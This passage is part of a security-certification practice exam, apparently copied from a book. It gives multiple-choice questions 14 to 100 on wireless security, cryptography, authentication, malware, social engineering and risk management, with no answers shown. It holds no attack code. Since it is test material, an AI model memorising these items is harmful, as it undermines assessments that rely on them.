- 14. Your company provides secure wireless Internet access to visitors and vendors working
- onsite. Some of the vendors are reporting they are unable to view the wireless network.
- Which of the following best describes the issue?
- A. MAC filtering is enabled on the WAP.
- B. The SSID broadcast is disabled.
- C. The wrong antenna type is being used.
- D. The wrong band selection is being used.
- 15. Your company’s sales team is working late at the end of the month to ensure all sales are
- reported for the month. The sales members notice they cannot save or print reports after
- regular hours. Which of the following general concepts is preventing the sales members
- from performing their job?
- A. Job rotation
- B. Time-of-day restrictions
- C. Least privilege
- D. Location-based policy
- 16. Which of the following symmetric algorithms are block ciphers? (Choose three.)
- A. 3DES
- B. ECDHE
- C. RSA
- D. RC4
- E. SHA
- F. TwofishChapter 7
- ■
- Practice Test
- 199
- 17. A security officer has asked you to use a password cracking tool on the company’s comput-
- ers. Which of the following best describes what the security officer is trying to accomplish?
- A. Looking for strong passwords
- B. Enforcing a minimum password length policy
- C. Enforcing a password complexity policy
- D. Looking for weak passwords
- 18. Which of the following test gives testers comprehensive network design information?
- A. White box
- B. Black box
- C. Gray box
- D. Purple box
- 19. You are the network administrator for your company and want to implement a wire-
- less network and prevent unauthorized access. Which of the following would be the best
- option?
- A. RADIUS
- B. TACACS+
- C. Kerberos
- D. OAUTH
- 20. Why is input validation important to secure coding techniques? (Choose two.)
- A. It mitigates shoulder surfing.
- B. It mitigates buffer overflow attacks.
- C. It mitigates ARP poisoning.
- D. It mitigates XSS vulnerabilities.
- 21. To authenticate, a Windows 10 user draws a circle around a picture of a dog’s nose and
- then touches each ear starting with the right ear. Which of the following concepts is this
- describing?
- A. Something you do
- B. Something you know
- C. Something you have
- D. Somewhere you are
- 22. Which of the following countermeasures is designed to best protect against a brute-force
- password attack?
- A. Password complexity
- B. Account disablement
- C. Password length
- D. Account lockoutChapter 7
- 200
- ■
- Practice Test
- 23. You are a security administrator reviewing the results from a network security audit. You
- are reviewing options to implement a solution to address the potential poisoning of name
- resolution server records. Which of the following would be the best choice?
- A. SSL
- B. SSH
- C. DNSSEC
- D. TLS
- 24. Your manager has implemented a new policy that requires employees to shred all sensitive
- documents. Which of the following attacks is your manager attempting to prevent?
- A. Tailgating
- B. Dumpster diving
- C. Shoulder surfing
- D. Man-in-the-middle
- 25. Which of the following cryptography algorithms support multiple bit strengths?
- A. DES
- B. HMAC
- C. MD5
- D. AES
- 26. A network security auditor will perform various simulated network attacks against your
- company’s network. Which should the security auditor acquire first?
- A. Vulnerability testing authorization
- B. Transfer risk response
- C. Penetration testing authorization
- D. Change management
- 27. A system administrator is told an application is not able to handle the large amount of traffic
- the server is receiving on a daily basis. The attack takes the server offline and causes it to drop
- packets occasionally. The system administrator needs to find another solution while keeping
- the application secure and available. Which of the following would be the best solution?
- A. Sandboxing
- B. DMZ
- C. Cloud computing
- D. DLP
- 28. You are a security administrator and are observing unusual behavior in your network
- from a workstation. The workstation is communicating with a known malicious destina-
- tion over an encrypted tunnel. You have updated the antivirus definition files and per-
- formed a full antivirus scan. The scan doesn’t show any clues of infection. Which of the
- following best describes what has happened on the workstation?
- A. Buffer overflow
- B.
- Session hijackingChapter 7
- C. Zero-day attack
- D. DDoS
- ■
- Practice Test
- 201
- 29. You are the security engineer and have discovered that communication within your com-
- pany’s encrypted wireless network is being captured with a sniffing program. The data
- being captured is then being decrypted to obtain the employee’s credentials to be used at
- a later time. Which of the following protocols is most likely being used on the wireless
- access point? (Choose two.)
- A. WPA2 Personal
- B. WPA2 Enterprise
- C. WPA
- D. WEP
- 30. A network manager has implemented a strategy so that all workstations on the network
- will receive required security updates regularly. Which of the following best describes
- what the network manager implemented?
- A. Sandboxing
- B. Ad hoc
- C. Virtualization
- D. Patch management
- 31. Your manager wants to secure the FTP server by using SSL. Which of the following
- should you configure?
- A. FTPS
- B. SFTP
- C. SSH
- D. LDAPS
- 32. You are an IT security officer and you want to classify and assess privacy risks throughout
- the development life cycle of a program or system. Which of the following tools would be
- best to use for this purpose?
- A. BIA
- B. PIA
- C. RTO
- D. MTBF
- 33. Which of the following types of risk analysis makes use of ALE?
- A. Qualitative
- B. ROI
- C. SLE
- D. QuantitativeChapter 7
- 202
- ■
- Practice Test
- 34. Which of the following statements best describes mandatory vacations?
- A. Companies ensure their employees can take time off to conduct activities together.
- B. Companies use them as a tool to ensure employees are taking the correct amount of
- days off.
- C. Companies ensure their employees are properly recharged to perform their duties.
- D. Companies use them as a tool for security protection to detect fraud.
- 35. Users of your company have been visiting the website www.abccompany.com and a recent
- increase in virus detection has been noted. Your company has developed a relationship
- with another company using the web address www.abccompany.com, but not with the site
- that has been causing the increase of viruses. Which of the following would best describe
- this attack?
- A. Session hijacking
- B. Cross-site scripting
- C. Replay attack
- D. Typo squatting
- 36. Which of the following would you enable in a laptop’s BIOS to provide full disk
- encryption?
- A. RAID
- B. USB
- C. HSM
- D. TPM
- 37. Your company has hired a third-party auditing firm to conduct a penetration test against
- your network. The firm wasn’t given any information related to the company’s network.
- What type of test is the company performing?
- A. White box
- B. Red box
- C. Black box
- D. Gray box
- 38. Server room access is controlled with proximity cards and records all entries and exits.
- These records are referred to if missing equipment is discovered, so employees can be iden-
- tified. Which of the following must be prevented for this policy to become effective?
- A. Shoulder surfing
- B. Tailgating
- C. Vishing
- D. Dumpster divingChapter 7
- ■
- Practice Test
- 203
- 39. Company users are stating they are unable to access the network file server. A company
- security administrator checks the router ACL and knows users can access the web server,
- email server, and printing services. Which of the following is preventing access to the net-
- work file server?
- A. Implicit deny
- B. Port security
- C. Flood guard
- D. Signal strength
- 40. An employee informs you that the Internet connection is slow and they are having diffi-
- culty accessing websites to perform their job. You analyze their computer and discover the
- MAC address of the default gateway in the ARP cache is not correct. What type of attack
- have you discovered?
- A. DNS poisoning
- B. Injection
- C. Impersonation
- D. ARP poisoning
- 41. Tony, a college student, downloaded a free word editor program to complete his essay.
- After downloading and installing the software, Tony noticed his computer was running
- slow and he was receiving notifications from his antivirus program. Which of the follow-
- ing best describes the malware that he installed?
- A. Keylogger
- B. Worm
- C. Ransomware
- D. Trojan
- 42. Which of the following measures the amount of time required to return a failed device,
- component, or network to normal functionality?
- A. RTO
- B. MTTR
- C. MTBF
- D. RPO
- 43. Natural disasters and intentional man-made attacks can cause the death of employees and
- customers. What type of impact is this?
- A. Safety
- B. Life
- C. Finance
- D. ReputationChapter 7
- 204
- ■
- Practice Test
- 44. A user finds and downloads an exploit that will take advantage of website vulnerabilities.
- The user isn’t knowledgeable about the exploit and runs the exploit against multiple web-
- sites to gain access. Which of the following best describes this user?
- A. Man-in-the-middle
- B. Script kiddie
- C. White hat
- D. Hacktivist
- 45. You are the IT security officer and you plan to develop a general cybersecurity aware-
- ness training program for the employees. Which of the following best describes these
- employees?
- A. Data owners
- B. Users
- C. System administrators
- D. System owners
- 46. The system administrator needs to secure the company’s data-at-rest. Which of the follow-
- ing would provide the strongest protection?
- A. Implement biometrics controls on each workstation.
- B. Implement full-disk encryption.
- C. Implement a host intrusion prevention system.
- D. Implement a host intrusion detection system.
- 47. Which of the following is a true statement about qualitative risk analysis?
- A. It uses numeric values to measure the impact of risk.
- B. It uses descriptions and words to measure the impact of risk.
- C. It uses industry best practices and records.
- D. It uses statistical theories, testing, and experiments.
- 48. Which of the following firewalls tracks the operating state and characteristics of network
- connections traversing it?
- A. Stateful firewall
- B. Stateless firewall
- C. Application firewall
- D. Packet filter firewall
- 49. Which of the following are examples of PII? (Choose two.)
- A. Fingerprint
- B. MAC address
- C. Home address
- D. GenderChapter 7
- ■
- Practice Test
- 205
- 50. An employee informs you they have lost a corporate mobile device. What is the first action
- you perform?
- A. Enable push notification services.
- B. Remotely wipe the mobile device.
- C. Enable screen lock.
- D. Enable geofencing.
- 51. You have created a backup routine that includes a full backup each Sunday night and
- a backup each night of all data that has changed since Sunday’s backup. Which of the fol-
- lowing best describes this backup schedule?
- A. Full and incremental
- B. Full and differential
- C. Snapshots
- D. Full
- 52. One of your colleagues attempted to ping a computer name and received the response of
- fe80::3281:80ea:b72b:0b55. What type of address did the colleague view?
- A. IPv6
- B. IPv4
- C. MAC address
- D. APIPA
- 53. Which of the following defines the act of sending unsolicited messages to nearby Blue-
- tooth devices?
- A. Jamming
- B. Bluesnarfing
- C. Brute force
- D. Bluejacking
- 54. You are a system administrator and you are creating a public and private key pair. You
- have to specify the key strength. Which of the following would be your best choice?
- A. RSA
- B. DES
- C. MD5
- D. SHA
- 55. You are the security administrator for the sales department and the department needs to
- email high volumes of sensitive information to clients to help close sales. All emails go
- through a DLP scanner. Which of the following is the best solution to help the department
- protect the sensitive information?
- A. Automatically encrypt outgoing emails.
- B.
- Monitor all outgoing emails.Chapter 7
- 206
- ■
- Practice Test
- C. Automatically encrypt incoming emails.
- D. Monitor all incoming emails.
- 56. You are the IT security officer of your company and have established a security policy
- that requires users to protect all sensitive documents to avoid their being stolen. What
- policy have you implemented?
- A. Separation of duties
- B. Clean desk
- C. Job rotation
- D. Privacy
- 57. Which of the following options can a security administrator deploy on a mobile device that
- will deter undesirable people from seeing the data on the device if it is left unattended?
- A. Screen lock
- B. Push notification services
- C. Remote wipe
- D. Full device encryption
- 58. You are a system administrator and are asked to prevent staff members from using each
- other’s credentials to access secured areas of the building. Which of the following will best
- address this request?
- A. Install a biometric reader at the entrance of the secure area.
- B. Install a proximity card reader at the entrance of the secure area.
- C. Implement least privilege.
- D. Implement group policy enforcement.
- 59. A sales manager has asked for an option for sales reps who travel to have secure remote
- access to your company’s database server. Which of the following should you configure
- for the sales reps?
- A. VPN
- B. WLAN
- C. NAT
- D. Ad hoc
- 60. An attacker tricks one of your employees into clicking on a malicious link that causes an
- unwanted action on the website the employee is currently authenticated to. What type of
- attack is this?
- A. Replay
- B. Cross-site request forgery
- C. Cross-site scripting
- D. Buffer overflowChapter 7
- ■
- Practice Test
- 207
- 61. Which of the following is considered the strongest access control?
- A. RBAC
- B. DAC
- C. MAC
- D. ABAC
- 62. Your company wants to expand its data center, but has limited space to store additional
- hardware. The IT staff needs to continue their operations while expansion is underway.
- Which of the following would best accomplish this expansion idea?
- A. IaaS
- B. Virtualization
- C. SaaS
- D. Public cloud
- 63. Which of the following algorithms have known collisions? (Choose two.)
- A. MD5
- B. AES
- C. SHA
- D. SHA-256
- E. RSA
- 64. Which of the following must a security administrator implement to allow customers, ven-
- dors, suppliers, and other businesses to obtain information while preventing access to the
- company’s entire network?
- A. Intranet
- B. Internet
- C. Extranet
- D. Honeynet
- 65. The head of HR is conducting an exit interview with an IT network administrator named
- Matt. The interview questions include Matt’s view of his manager, why he is leaving his
- current position, and what he liked most about his job. Which of the following should
- also be addressed in this exit interview?
- A. Job rotation
- B. NDA
- C. Background checks
- D. Property return form
- 66. Which of the following is considered the least secure authentication method?
- A. TACACS+
- B. CHAP
- C. NTLM
- D. PAPChapter 7
- 208
- ■
- Practice Test
- 67. You are a security administrator for your company and have been asked to recommend a
- secure method for storing passwords due to recent brute-force attempts. Which of the fol-
- lowing will provide the best protection? (Choose two.)
- A. ROT13
- B. BCRYPT
- C. RIPEMD
- D. PBKDF2
- 68. You installed a WAP for a local coffee shop and have discovered the signal is extending
- into the parking lot. Which of the following configurations will best correct this issue?
- A. Change the antenna type.
- B. Disable the SSID broadcast.
- C. Reduce the signal strength for indoor coverage only.
- D. Enable MAC filtering to prevent devices from accessing the wireless network.
- 69. You are a network administrator for a bank. A branch manager discovers that the desk-
- side employees have the ability to delete lending policies found in a folder within the file
- server. You review the permissions and notice the deskside employees have “modify”
- permissions to the folder. The employees should have read permissions only. Which of the
- following security principles has been violated?
- A. Job rotation
- B. Time-of-day restrictions
- C. Separation of duties
- D. Least privilege
- 70. Which of the following concepts of cryptography ensures integrity of data by the use of
- digital signatures?
- A. Key stretching
- B. Steganography
- C. Key exchange
- D. Hashing
- 71. Your manager has asked you to recommend a public key infrastructure component to
- store certificates that are no longer valid. Which of the following is the best choice?
- A. Intermediate CA
- B. CSR
- C. CRL
- D. Key escrow
- 72. You are a backup operator and receive a call from a user asking you to send sensitive docu-
- ments immediately because their manager is going to a meeting with the company’s executives.
- The user states the manager’s files are corrupted and he is attending the meeting in the next 5
- minutes. Which of the following forms of social engineering best describes this situation?
- A. Scarcity
- B.
- ConsensusChapter 7
- C. Intimidation
- D. Authority
- ■
- Practice Test
- 209
- 73. Which of the following controls can you implement together to prevent data loss if a
- mobile device is lost or stolen? (Choose two.)
- A. Geofencing
- B. Full-device encryption
- C. Screen locks
- D. Push notification services
- 74. You are asked to find the MAC address on a Linux machine. Which of the following
- commands can you use to discover it?
- A. ipconfig
- B. ifconfig
- C. tracert
- D. ping
- 75. A chief security officer (CSO) notices that a large number of contractors work for the
- company. When a contractor leaves the company, the provisioning team is not notified.
- The CSO wants to ensure the contractors cannot access the network when they leave.
- Which of the following polices best supports the CSO’s plan?
- A. Account disablement
- B. Account lockout policy
- C. Enforce password history
- D. Account expiration policy
- 76. The CISO wants to strengthen the password policy by adding special characters to users’
- passwords. Which of the following control best achieves this goal?
- A. Password complexity
- B. Password length
- C. Password history
- D. Group policy
- 77. Which of the following deployment models allows a business to have more control of the
- devices given to employees that handle company information?
- A. DLP
- B. COPE
- C. BYOD
- D. CYODChapter 7
- 210
- ■
- Practice Test
- 78. A network administrator uses their fingerprint and enters a PIN to log onto a server.
- Which of the following best describes this example?
- A. Identification
- B. Single authentication
- C. Multifactor authentication
- D. Transitive trust
- 79. Your company wants to perform a privacy threshold assessment (PTA) to identify all PII
- residing in its systems before retiring hardware. Which of the following would be exam-
- ples of PII? (Choose two.)
- A. Date of birth
- B. Email address
- C. Race
- D. Fingerprint
- 80. Your HIPS is incorrectly reporting legitimate network traffic as suspicious activity. What
- is this best known as?
- A. False positive
- B. False negative
- C. Credentialed
- D. Noncredentialed
- 81. Matt, a network administrator, is asking how to configure the switches and routers to
- securely monitor their status. Which of the following protocols would he need to imple-
- ment on the devices?
- A. SSH
- B. SNMP
- C. SMTP
- D. SNMPv3
- 82. Your company has issued a hardware token-based authentication to administrators to
- reduce the risk of password compromise. The tokens display a code that automatically
- changes every 30 seconds. Which of the following best describes this authentication
- mechanism?
- A. TOTP
- B. HOTP
- C. Smartcard
- D. Proximity cardChapter 7
- ■
- Practice Test
- 211
- 83. You are the network administrator for your company’s Microsoft network. Your CISO is
- planning the network security and wants a secure protocol that will authenticate all users
- logging into the network. Which of the following authentication protocols would be the
- best choice?
- A. RADIUS
- B. TACACS+
- C. Kerberos
- D. SAML
- 84. Which of the following is not a vulnerability of end-of-life systems?
- A. When systems can’t be updated, firewalls and antiviruses are not sufficient
- protection.
- B. Out-of-date systems can result in fines in regulated industries.
- C. When an out-of-date system reaches the end-of-life, it will automatically shut down.
- D. Operating out-of-date systems can result in poor performance and reliability and can
- lead to denial of services.
- 85. Which of the following statements are true regarding viruses and worms? (Choose two.)
- A. A virus is a malware that self-replicates over the network.
- B. A worm is a malware that self-replicates over the network.
- C. A virus is a malware that replicates by attaching itself to a file.
- D. A worm is a malware that replicates by attaching itself to a file.
- 86. Which of the following wireless attacks would be used to impersonate another WAP to
- obtain unauthorized information from nearby mobile users?
- A. Rogue access point
- B. Evil twin
- C. Bluejacking
- D. Bluesnarfing
- 87. Tony, a security administrator, discovered through an audit that all the company’s access
- points are currently configured to use WPA with TKIP for encryption. Tony needs to
- improve the encryption on the access points. Which of the following would be the best
- option for Tony?
- A. WPA2 with CCMP
- B. WEP
- C. WPA with CCMP
- D. WPSChapter 7
- 212
- ■
- Practice Test
- 88. Your department manager assigns Tony, a network administrator, the job of expressing
- the business and financial effects that a failed SQL server would cause if it was down for
- 4 hours. What type of analysis must Tony perform?
- A. Security audit
- B. Asset identification
- C. Business impact analysis
- D. Disaster recovery plan
- 89. You are the security administrator for a local hospital. The doctors want to prevent the
- data from being altered while working on their mobile devices. Which of the following
- would most likely accomplish the request?
- A. Cloud storage
- B. Wiping
- C. SIEM
- D. SCADA
- 90. You are a Unix engineer, and on October 29 you discovered that a former employee had
- planted malicious code that would destroy 4,000 servers at your company. This mali-
- cious code would have caused millions of dollars worth of damage and shut down your
- company for at least a week. The malware was set to detonate at 9:00 a.m. on January 31.
- What type of malware did you discover?
- A. Logic bomb
- B. RAT
- C. Spyware
- D. Ransomware
- 91. Which of the following is defined as hacking into a computer system for a politically or
- socially motivated purpose?
- A. Hacktivist
- B. Insider
- C. Script kiddie
- D. Evil twin
- 92. A network administrator with your company has received phone calls from an individual
- who is requesting information about their personal finances. Which of the following type
- of attack is occurring?
- A. Whaling
- B. Phishing
- C. Vishing
- D. Spear phishingChapter 7
- ■
- Practice Test
- 213
- 93. Which of the following can be restricted on a mobile device to prevent security violations?
- (Choose three.)
- A. Third-party app stores
- B. Biometrics
- C. Content management
- D. Rooting
- E. Sideloading
- 94. Which of the following does a remote access VPN usually rely on? (Choose two.)
- A. IPSec
- B. DES
- C. SSL
- D. SFTP
- 95. Matt, a security administrator, wants to use a two-way trust model for the owner of a cer-
- tificate and the entity relying on the certificate. Which of the following is the best option
- to use?
- A. WPA
- B. Object identifiers
- C. PFX
- D. PKI
- 96. If domain A trusts domain B, and domain B trusts domain C, then domain A trusts
- domain C. Which concept does this describe?
- A. Multifactor authentication
- B. Federation
- C. Single sign-on
- D. Transitive trust
- 97. A user entered a username and password to log into the company’s network. Which of the
- following best describes the username?
- A. Authorization
- B. Authentication
- C. Identification
- D. Accounting
- 98. Which of the following tools can be used to hide messages within a file?
- A. Data sanitization
- B. Steganography
- C. Tracert
- D. Network mapping
- 99. Which of the following is best used to prevent ARP poisoning on a local network?
- (Choose two.)
- A. Antivirus
- B. Static ARP entries
- C. Patching management
- D. Port security
- 100. Which of the following is the best practice to place at the end of an ACL?
- A. USB blocking
- B. Time synchronization
- C. MAC filtering
- D. Implicit deny
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement